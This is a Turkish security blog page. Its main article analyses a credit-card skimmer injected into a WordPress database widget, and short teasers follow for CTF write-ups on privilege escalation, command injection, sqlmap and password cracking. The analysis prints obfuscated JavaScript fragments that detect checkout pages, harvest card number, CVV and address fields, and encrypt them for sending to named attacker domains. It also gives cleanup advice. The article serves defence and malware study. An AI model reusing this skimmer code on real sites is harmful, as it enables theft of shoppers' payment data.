CTF Çözümleri

TryHackMe | Sudo Security ByPass WriteUp

Bu yazımda TryHackMe platformunda bulunan Sudo Security ByPass odasının çözümünü anlatacağım. İlk önce odanın bize verdiği username ve passsword bilgileriyle makineye ssh ile bağlanıyoruz.Username ve password tryhackme:tryhackme olarak verilmiş.”ssh -p 2222 tryhackme@10.10.14.158″ komutu ile 10.10.14.158 IP adresindeki sunucuya, 2222 numaralı port üzerinden, tryhackme kullanıcı adı ile ssh bağlantısı kurmaya çalışıyoruz. Komutu çalıştırdığımızda bağlantı kurduğumuzu görüyoruz ve “sudo -V” komutu ile sudonun versiyonunu öğreniyoruz. Versiyonu 1.8.21 olarak görüyoruz. “sudo -l” komutunu çalıştırıyoruz ve /bin/bash komutunu çalıştırabildiğimizi görüyoruz.Bu aynı zamanda 1. sorumuzun cevabı oluyor. Şimdi versiyonun 1.8.21 olduğunu biliyoruz ve /bin/bash komutunu çalıştırabildiğimizi biliyoruz.Sudo’nun 1.8.28 ve önceki sürümlerinde kullanıcıların root yetkisiyle komut

14 Ocak 2025
CTF Çözümleri

TryHackMe | Sudo Buffer Overflow WriteUp

Bu yazımda  TryHackMe platformunda bulunan Sudo Buffer Overflow odasının çözümünü anlatacağım.Bu odada sudonun 1.8.30 ve önceki versiyonlarında pwfeedback etkinleştirilirse ortaya çıkan bir buffer overflow açığı var. İlk önce odanın bize verdiği username ve passsword bilgileriyle makineye ssh ile bağlanıyoruz.Username ve password tryhackme:tryhackme olarak verilmiş.”ssh -p 4444 tryhackme@10.10.251.118″ komutu ile 10.10.251.118 IP adresindeki sunucuya, 4444 numaralı port üzerinden, tryhackme kullanıcı adı ile ssh bağlantısı kurmaya çalışıyoruz. Komutu çalıştırdığımızda bağlantı kurduğumuzu görüyoruz ve “sudo -V” komutu ile sudonun versiyonunu öğreniyoruz. Versiyonu 1.8.21 olarak görüyoruz.Şimde pwfeedback’in etkin olup olmadığını öğrenmemiz gerekiyor.Root olmaya çalışırken şifre girerken “*****” karakterini görürsek pwfeedback etkin demektir. Ve gördüğümüz

4 Ocak 2025
CTF Çözümleri

CyberExam | Privilege Escalation-Exploiting Capabilities WriteUp

Bu yazımda CyberExam platformunda bulunan Privilege Escalation-Exploiting Capabilities odasının çözümünü anlatacağım.Bu oda bizden “flag.txt” dosyasını okumamızı istiyor. İlk önce “scp LinEnum.sh user@192.168.0.40:/tmp” komutu ile LinEnum.sh adlı betiği, user adlı kullanıcıyla 192.168.0.40 IP adresindeki sunucunun tmp dizinine güvenli bir şekilde kopyalıyorum. Daha sonra “ssh user@192.168.0.40” komutu ile 192.168.0.40 IP adresindeki sunucuya, user adlı kullanıcı hesabıyla bağlanma işlemi başlatıyoruz ve şifreyi odanın başında verildiği gibi password olarak giriyoruz.Bağlandığımızı görüyoruz. “getcap -r / 2>/dev/null” komutu ile sistemdeki tüm dosyaların ve dizinlerin ek yeteneklerini (capabilities) listeleliyorum ve “cap_setuid+ep” ek yeteneğini görüyorum.Bu yetenek bir sürecin kullanıcı kimliğini(UID) değişterimesine izin verir.Aklıma root yetkileriyle bash kabuğu başlatan

30 Aralık 2024
CTF Çözümleri

CyberExam | MQTT Exploitation WriteUp

Bu yazımda CyberExam platformunda bulunan MQTT Exploitation odasının çözümünü anlatacaım.Oda bizden 1-MQTT Sunucusunun Kullanıcı Adı ve Şifresi? (kullanıcı adı:şifre) 2-Yayıncının yayınladığı değer nedir? sorularının cevabını istiyor.   “ifconfig” komutu ile kendi IP adresimi öğrenerek başlıyorum. Kendi IP adresimi öğrendikten sonra “nmap  -sV 10.0.1.2/24” komutu ile ağdaki cihazların açık olan portlarını ve bu portlarda çalışan servislerin hangi versiyonlarını kullanıldığını öğreniyorum. Ve 10.0.1.4 IP adresinde mqtt portunun açık olduğunu gördükten sonra “msfconsole” komutu ile metasploiti başlatıyorum.”search mqtt” komutu ile mqtt ile ilgili modül aratıyorum. Karşıma auxiliary modülü çıkıyor ve bu modülü kullanarak mqtt sunucusunun kullanıcı adını ve şifresini öğrenebilirim.”use 0” komutu ile

27 Aralık 2024
Haberler, Nedir?

CVE-2024-45387 | Apache Traffic Control’da Kritik SQL Injection

Apache Yazılım Vakfı , Apache Traffic Control’da kritik bir güvenlik açığını gidermek için güvenlik güncellemeleri yayınladı. Başarıyla istismar edilmesi durumunda, bu açık bir saldırganın veritabanında SQL komutları çalıştırmasına olanak tanıyabilir. SQL injection güvenlik açığı, CVE-2024-45387 olarak izleniyor ve CVSS puanlama sisteminde 10 üzerinden 9,9 olarak derecelendirilmiştir. Apache Traffic Control <= 8.0.1 ve >= 8.0.0 sürümlerindeki Traffic Ops’da bulunan bir SQL injection güvenlik açığı, ‘admin,’ ‘federation,’ ‘operations,’ ‘portal’ veya ‘steering’ rolüne sahip yetkili bir kullanıcının özel olarak hazırlanmış bir PUT isteği göndererek veritabanında SQL çalıştırmasına olanak tanıyor. Ayrıca, belirli koşullar altında uzaktan kod yürütme (RCE) ile sonuçlanabilecek önemli bir güvenlik açığı

26 Aralık 2024
CTF Çözümleri

CyberExam | Crack PDF File WriteUp

Bu yazımda CyberExam platformunda bulunan Crack PDF File odasının çözümünü anlatacağım.Bu oda bizden pdf uzantılı dosyanın şifresini istiyor. İlk önce “sudo su” komutu ile root oluyoruz. Şifreyi odanın girişinde verildiği gibi “user” olarak giriyoruz. Masaüstünde bulunan secret.pdf dosyasını “pdf2john secret.pdf > mehmet.txt” komutu ile secret.pdf dosyasındaki şifreleme algoritmasını belirleyip hash değerini oluşturur ve bu hash değeri John the Ripper tarafından okunabilecek bir formatta “mehmet.txt” dosyasına yazar. Bu hash değerini kırmak için wordliste ihtiyacım var. Bunun için /usr/share/wordlists dizinine gidiyorum ve rockyou.txt wordlistinin sıkıştırılmış olduğunu görüyorum. Ve “gunzip -f rockyou.txt.gz” komutu ile sıkıştırmadan çıkarıyorum. En sonda ise “john –wordlist=/usr/share/wordlists/rockyou.txt mehmet.txt” komutu

12 Aralık 2024
CTF Çözümleri

CyberExam | Command Injection (Type 1) WriteUp

Bu yazımda CyberExam platformunda bulunan Command Injection (Type 1) odasının çözümünü anlatacağım.Oda bizden “flag.txt”yi istiyor.   “ifconfig” komutu ile kendi IP adresimizi öğreniyoruz. Kendi IP adresimi öğrendikten sonra “nmap -sV 10.0.1.2/24” komutuyla  bu IP adresi aralığındaki cihazların açık portlarını ve bu portlarda çalışan servislerin versiyonların bilgilerini öğreniyoruz. Çıktı sonucunda “10.0.1.40” IP adresinde 80 numaralı http portu açık ve bu IP adresinde bir web sunucusunun çalıştığını görüyorum.Browserdan bu IP adresinin bu portuna gidiyorum. Karşıma çıkan ekranda “Click here to ping localhost” bağlantısına tıkladığımda kendi local hostuma ping atmış oluyorum.Bunun arka taraftaki komutu “ping 127.0.0.1″dir. URL’e bir önceki komutu ; ile ayırıp

4 Aralık 2024
CTF Çözümleri

CyberExam | Tomcat Exploitation-Part 1 WriteUp

Bu yazımda CyberExam platformunda bulunan Tomcat Exploitation-Part 1 odasının çözümünü anlatacağım.Oda bizden kendi dahili ağımızda çalışan Tomcat sunucusunu bulmamızı ve 1- Tomcat Server’ın IP adresi nedir? 2-Tomcat Server’ın Port numarası nedir? 3-Tomcat Server’ın kullanıcı adı ve şifresi nedir? (kullanıcı adı:şifre) bu 3 soruyu cevaplamamızı istiyor.   “ifconfig” komutuyla kendi IP adresimizi öğreniyoruz. Kendi IP adresimin “10.0.1.2” olduğunu görüyorum ve “nmap -sV 10.0.1.2/24” komutu ile bu IP adresi aralığındaki cihazların açık portlarını ve bu portlarda çalışan servislerin versiyonlarına ulaşabiliriz. Ve bu çıktıda “10.0.1.3” IP adresinin “8080” portunda bir Tomcat Server çalışıyor.Böylelikle 1. sorumuzun cevabı “10.0.1.3” , 2. sorumuzun cevabı “8080” oluyor.

1 Aralık 2024
CTF Çözümleri

CyberExam | Sqlmap for Beginners WriteUp

Bu yazımda CyberExam platformunda bulunan Sqlmap for Beginners odasının çözümünü anlatacağım.Oda bizden 1-Savunmasız parametre nedir? 2-Mark’ın şifresi nedir? bu iki sorunun cevabını istiyor.   “ifconfig” komutu ile kendi makinemin IP adresini öğrenerek başlıyorum. Makinemin IP adresini “10.0.1.2” olarak öğreniyorum ve şimdi “nmap 10.0.1.2/24”komutu ile dahili ağımı tarıyorum. Ve “10.0.1.40” IP adresinde HTTP portunun açık olduğunu görüyorum ve bu IP adresiyle portu tarayıcıda açıyorum. Böyle bir ekranla karşılaşıyorum ve “click here to query employee names using id” bağlantısına tıklıyorum. ID değerlerini denerken 3 numaralı id değerinin Mark’a ait olduğunu öğreniyorum ve bu URL’i sqlmap’de inceliyorum.”sqlmap -u “http://10.0.1.40/task/task1.php?id=3” –dbs”komutu ile web uygulamasında

27 Kasım 2024
CTF Çözümleri

CyberExam | Memory Forensics with Volatility WriteUp

Bu yazımda CyberExam platformunda bulunan Memory Forensics with Volatility odasının çözümünü anlatacağım.Oda bizden 1-“As Layer1” değeri nedir? 2-Görüntünün Alındığı Tarih ve Saat Nedir? 3-İlk KDBG profil değeri nedir? 4-Ters bağlantı için kullanılan .exe dosyasının adı nedir? 5-Ters bağlantının başlangıç ​​tarihi nedir? 6-Dllhost.exe PPID değeri nedir? 7-Ters bağlantıı kuran saldırganın IP adresi nedir? 8-Ters bağlantıda saldırganın kullandığı PORT adresi nedir? 9-Ters bağlantı için kullanılan .exe dosyasının bulunduğu klasör? (Dosya adıyla tam yol: \De***\Ha***\) 10-Bu dosyayı indiren kullanıcı adı nedir?(Ters bağlantı) 11-İnternetten indirdiğiniz fotoğrafın adı nedir? Bu 11 soruyu cevaplamımızı istiyor.   “volatility -f memdump.mem imageinfo” komutu ile bellek görüntüsünün temel özelliklerini

24 Kasım 2024
Home
Gizli Kredi Kartı Skimmer’ı, WordPress Ödeme Sayfalarını Veritabanı Enjeksiyonu Yoluyla Hedefliyor
Haberler

Gizli Kredi Kartı Skimmer’ı, WordPress Ödeme Sayfalarını Veritabanı Enjeksiyonu Yoluyla Hedefliyor

By  On 16 Ocak 2025 Yorum yapılmamış

Kısa süre önce, bir kredi kartı skimmer’ının bir Magento sitesinin ödeme sayfalarını hedef aldığına dair bir makale yayımladık. Şimdi ise, güvenliği ihlal edilmiş bir WordPress web sitesi üzerinde yaptığımız incelemelerde daha gelişmiş bir kredi kartı skimmer kötü amaçlı yazılımıyla karşılaştık.

Bu kötü amaçlı yazılım, WordPress web sitelerini hedef alarak, veritabanı girdilerine zararlı JavaScript kodları sessizce enjekte ediyor ve hassas ödeme bilgilerini çalıyor. Yazılım, özellikle ödeme sayfalarında aktif hale geliyor ve ya mevcut ödeme alanlarını ele geçiriyor ya da sahte bir kredi kartı formu ekliyor.

malicious javascript

Kötü Amaçlı Yazılım Nerede Bulundu?

Zararlı kod, WordPress veritabanında wp_options tablosu altında tespit edildi. Özellikle şu satırda yer alıyordu:

  • option_name: widget_block
  • option_value: Karmaşık JavaScript kodunu içeriyor.

Bu kötü amaçlı yazılım, kendisini tema dosyaları veya eklentiler yerine veritabanına enjekte ederek, yaygın dosya tarama araçlarından kaçmayı başarıyor. Bu da kötü amaçlı yazılımın, ihlal edilmiş WordPress sitelerinde sessizce varlığını sürdürmesine olanak tanıyor.

Zararlı JavaScript, WordPress yönetim paneli (wp-admin > widgets) aracılığıyla HTML blok widget’ına enjekte edilmiş olarak bulundu.

HTML block widget

Kötü Amaçlı Yazılım Nasıl Çalışır?

Kötü amaçlı yazılım, sayfa URL’sinde “checkout” ifadesini kontrol ederken “cart” kelimesini hariç tutar. Bu yöntem, kötü amaçlı yazılımın yalnızca kullanıcıların ödeme bilgilerini göndermeye hazır olduğu sırada etkinleşmesini sağlar.

javascript
const _0x232f96 = '/checkout';
if (window.location.toString().toLowerCase().search('' + _0x232f96) !== -1) {...}

Kötü amaçlı yazılım, meşru ödeme sağlayıcılarını (örneğin, Stripe) taklit eden sahte bir ödeme formu oluşturur. Bu form, kredi kartı numarası, son kullanma tarihi, CVV ve fatura bilgileri için alanlar içerir. Eğer sayfada zaten bir meşru ödeme formu varsa, kötü amaçlı yazılım bu alana girilen verileri gerçek zamanlı olarak yakalar.

javascript
const fakeForm = '<div id="stripe-payment-form-wrap">...</div>';

Bu yöntem, kullanıcıların farkında olmadan hassas ödeme bilgilerini saldırganlara sağlamasına yol açar.

sensitive data

Kötü Amaçlı Yazılımın Nasıl Çalıştığı

Kötü amaçlı yazılım, ziyaretçi ödeme bilgilerini doldurdukça bu bilgileri gerçek zamanlı olarak yakalar. Bazı durumlarda, mevcut ödeme alanlarını ele geçirir ve yeni bir form oluşturmadan çalışır. Bu yaklaşım, çeşitli ödeme sistemleriyle uyumluluğu sağlar.

Ödeme Bilgilerini Yakalama ve Şifreleme

Kötü amaçlı yazılım, kullanıcının girdiği bilgileri toplar ve şifreleyerek uzak bir saldırgan sunucusuna gönderir:

javascript
function _0x50efa4() {
_0x5ab8c6.Number = document.getElementById(_0x3c48c0)
? document.getElementById(_0x3c48c0).value.replaceAll(' ', '')
: '';
_0x5ab8c6.CVV = document.getElementById(_0x4cbdac)
? document.getElementById(_0x4cbdac).value
: '';
_0x5ab8c6.Expiration = document.getElementById(_0x526fa8)
? document.getElementById(_0x526fa8).value
: '';
_0x5ab8c6.Address = document.getElementById(_0x72d8fc)
? document.getElementById(_0x72d8fc).value
: '';
_0x5ab8c6.FullName = document.getElementById(_0x37276b)
? document.getElementById(_0x37276b).value
: '';
_0x5ab8c6.City = document.getElementById(_0x4e4454)
? document.getElementById(_0x4e4454).value
: '';
_0x5ab8c6.Zip = document.getElementById(_0x31755f)
? document.getElementById(_0x31755f).value
: '';
}

Verilerin Şifrelenmesi ve Gönderilmesi

Çalınan veriler, AES-CBC algoritması ile şifrelenir ve ardından Base64 ile kodlanır. Şifrelenmiş veriler, kullanıcı deneyimini kesintiye uğratmadan sessizce iletilir:

javascript
async function _0x233872(_0x521845, _0x5e6977, _0xd6a8ef) {
try {
var _0x5180cb = Uint8Array.from(atob(_0x521845), (_0x47cd28) =>
_0x47cd28.charCodeAt(0)
);
var _0x25deba = Uint8Array.from(atob(_0x5e6977), (_0x45785d) =>
_0x45785d.charCodeAt(0)
);
var _0x152dd3 = await crypto.subtle.importKey(
'raw',
_0x5180cb,
'AES-CBC',
false,
['encrypt']
);
var _0x3f060d = await crypto.subtle.encrypt(
{
name: 'AES-CBC',
iv: _0x25deba,
},
_0x152dd3,
new TextEncoder().encode(_0xd6a8ef)
);
const _0x4d0c53 = btoa(
String.fromCharCode.apply(null, new Uint8Array(_0x3f060d))
);
return _0x4d0c53;
} catch (_0x2dc142) {
throw _0x2dc142;
}
}

Çalınan veriler, aşağıdaki gibi kötü amaçlı alan adlarına gönderilir:

  • valhafather[.]xyz
  • fqbe23[.]xyz

Bu alan adları, saldırganların kontrolünde olup şimdilik kara listede yer almaktadır.

Tehditin Tehlikesi

Bu kötü amaçlı yazılım, ödeme bilgilerinin (kredi kartı numaraları, CVV kodları gibi) sessizce çalınmasına olanak tanır. Çalınan bilgiler, dolandırıcılıkta kullanılabilir veya yeraltı pazarlarında satılabilir. Kötü amaçlı yazılım, arka planda çalışarak normal ödeme sürecini kesintiye uğratmadan hedefini gerçekleştirir.

Temizlik ve Koruma Önlemleri

  1. HTML Widget’larını İnceleyin
    • WordPress yönetici paneline giriş yapın.
    • wp-admin > Görünüm > Widget’lar sekmesine gidin.
    • Tüm Özel HTML blok widget’larını şüpheli <script> etiketleri için kontrol edin.
  2. Korunma Adımları
    • Düzenli Güncellemeler: Eklentiler ve temalar dahil olmak üzere web sitenizin tüm yazılımlarını güncel tutun.
    • Güçlü Yönetici Şifreleri: İki faktörlü kimlik doğrulamayı etkinleştirin ve güçlü şifreler kullanın.
    • Dosya Bütünlüğü İzleme: Dosya değişikliklerini tespit etmek için bir bütünlük izleme aracı kullanın.
    • Web Uygulama Güvenlik Duvarı (WAF): Kötü amaçlı trafiği engellemek ve saldırılara karşı koruma sağlamak için bir güvenlik duvarı uygulayın.

Sonuç

Bu kredi kartı skimmer, WordPress veritabanlarında gizlenerek hassas ödeme işlemlerini hedef alıyor. Kullanıcılar, farkında olmadan ödeme bilgilerini saldırganlara sağlıyor. Güncel kalmak, düzenli tarama yapmak ve güçlü güvenlik önlemleri almak bu tür tehditlere karşı koruma sağlar.

Related Posts

About The Author

GorkemHincer

18 yıllık Bilgi Teknolojileri deneyimim boyunca Türkiye'nin en büyük kimya tesislerinden olan Koruma Şirketler Grubu ve Koruma Klor'da BT altyapısının geliştirilmesinde önemli rol oynadım. BT Network, Sistem ve Siber Güvenlik alanlarında uzmanlaşarak, şirketlerin dijital dönüşüm süreçlerine katkı sağladım. Siber güvenlik alanındaki gelişimimi Udemy'de siber güvenlik eğitmeni olarak verdiğim eğitimlerle desteklerken, Siber Güvenlik Web TR'de editör olarak sektöre yönelik içerikler üretiyorum. Yeni teknolojileri yakından takip ederek, katıldığım teknoloji sempozyumlarıyla sektördeki gelişmeleri takip ediyorum.

Reply